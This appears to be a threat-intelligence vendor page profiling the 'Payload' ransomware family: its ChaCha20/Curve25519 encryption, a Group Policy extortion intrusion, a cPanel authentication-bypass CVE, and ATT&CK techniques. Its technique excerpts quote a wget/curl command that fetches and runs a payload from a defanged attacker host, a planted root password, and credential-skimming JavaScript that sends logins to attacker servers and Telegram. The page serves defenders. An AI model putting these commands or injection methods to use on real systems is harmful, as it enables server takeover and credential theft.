Payload is a cross-platform ransomware family associated with a criminal extortion operation first identified in February 2026. It has Windows and Linux variants, including an encryptor targeting VMware ESXi virtualized environments. Its operators have targeted organizations globally, including a manufacturing enterprise in the Middle East, and have received compromised network access from initial-access brokers associated with the FortiBleed credential-compromise campaign.
Payload encryptors combine Curve25519 key exchange with ChaCha20 encryption, generate per-file cryptographic material, and use multithreaded processing and partial encryption to accelerate attacks against large files. Encryption and key generation occur locally without requiring command-and-control communication for key exchange. The Windows variant can encrypt local drives and network shares, terminate backup, database, and security processes and services, delete Volume Shadow Copies, clear Windows event logs, suppress Event Tracing for Windows, and delete itself. The ESXi variant enumerates virtual-machine inventory, powers off virtual machines, and focuses on large virtual-disk files. It incorporates runtime string decryption, anti-debugging checks, and CPU-dependent encryption optimizations.
Payload-associated operations also employ extortion without encryption. In an April 2026 attack against a Middle Eastern manufacturer, an actor accessed the network through FortiGate SSL VPN using compromised domain credentials and abused domain-root-linked Active Directory Group Policy Objects. These policies distributed ransom demands, replaced desktop and lock-screen imagery, imposed logon messages, disabled local administrator accounts, and turned off Windows Firewall. The malicious policy links maintained the disruptive configuration without endpoint-resident malware. Data was exfiltrated from file servers and other systems and subsequently published on the dark web. No Windows file encryption was observed, and an ESXi encryptor found on Linux servers was not confirmed to have executed. These data-theft and policy-abuse behaviors belong to the associated intrusion operation rather than demonstrated native exfiltration functionality in the encryptors.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Attackers are exploiting cPanel flaw CVE-2026-41940 to install the Filemanager backdoor and gain unauthorized admin access... CVE-2026-41940 is an authentication bypass flaw affecting cPanel and WHM versions after 11.40. | Researchers also uncovered a new Go-based malware called “Payload,” which installs SSH keys, malicious PHP and JavaScript code, steals credentials, and sends stolen data to attackers through Telegram before deploying a remote-control trojan named Filemanager.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Researchers also uncovered a new Go-based malware called “Payload,” which installs SSH keys, malicious PHP and JavaScript code, steals credentials, and sends stolen data to attackers through Telegram before deploying a remote-control trojan named Filemanager.
29 distinct techniques documented for this family, organized by ATT&CK tactic.
Modify ROOT password root:123Qwe123C Implant SSH public key ssh-ed25519 ... cpanel-updater
Modify the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System registry key, changing the legalnoticecaption value to 'Welcome to Payload!' and the legalnoticetext to the ransom note text.
The threat actor authenticates to the FortiGate SSL VPN using a valid but compromised domain credential.
CVE-2026-41940 is a high-severity unauthenticated authentication bypass vulnerability affecting cPanel & WHM... an attacker can remotely bypass authentication and take over the cPanel / WHM control panel, allowing an unauthenticated remote attacker to gain administrator privileges on the affected server.
Modify the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System registry key, changing the legalnoticecaption value to 'Welcome to Payload!' and the legalnoticetext to the ransom note text.
«Создали объект групповой политики (GPO) с названием “PAYLOAD” и привязали его к корню домена».
Inject Javascript code... Download login.js and login.tmpl from the remote server... save them to /usr/local/cpanel/base/unprotected/cpanel to create a customized login page.
Written in Go and likely generated with AI assistance, the malware changes root passwords, installs SSH keys, deploys PHP webshells, injects malicious JavaScript into cPanel login pages, steals credentials, and exfiltrates sensitive data.
The login.js... uses code snippets to steal the user's username, password, User-Agent, and current URL during login, and sends this sensitive data via an AJAX request to a remote server controlled by the attackers.
Its main functions are: implanting an SSH public key, malicious PHP, and JS code into the compromised cPanel system, stealing login credentials, sending the stolen information back to a Telegram group controlled by the attackers
“Data exfiltration was observed originating from the file servers and several additional systems, and was later published on the dark web.”
The attackers also used Telegram bots as a backup channel to receive stolen information.
The C2 responds with a JSON object... reports key parameters... back to the C2 address https://wrned.]com/api.php?t=3&c=1 ... sends this sensitive data via an AJAX request to a remote server controlled by the attackers.
Its function is to request a malicious payload named Update from the download server cp.dene.[de.com , and run it continuously in the background using the nohup command... wget -q -O "$F" 'https://cp.dene.[de.com/Update' ... || curl -sk -o "$F" 'https://cp.dene.[de.com/Update'
«На Linux-серверах организации исследователи обнаружили версию шифровальщика PAYLOAD для ESXi, однако нет никаких доказательств его запуска в рамках этой атаки».
“PAYLOAD analysis reveals that the Windows ransomware variant contains logic that targets security processes and services ... (T1685 and T1489).”
“Public PAYLOAD sample analysis reports the deletion of Windows Volume Shadow Copies before encryption (T1490).”
32 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
29 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Named ransomware connected by the advisory to access obtained through FortiBleed. The content provides no details about its payload, deployment method, or encryption behavior.
Ransomware identified as benefiting from the FortiBleed attack chain and compromised Fortinet access. The content provides no further details about its functionality or deployment.
Named ransomware whose affiliates are linked to purchasing access obtained through the FortiBleed credential-harvesting campaign. The article does not detail its technical behavior.
Ransomware reported as connected to downstream operations supported by FortiBleed initial-access brokers. No malware-specific behavior or deployment details are provided.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.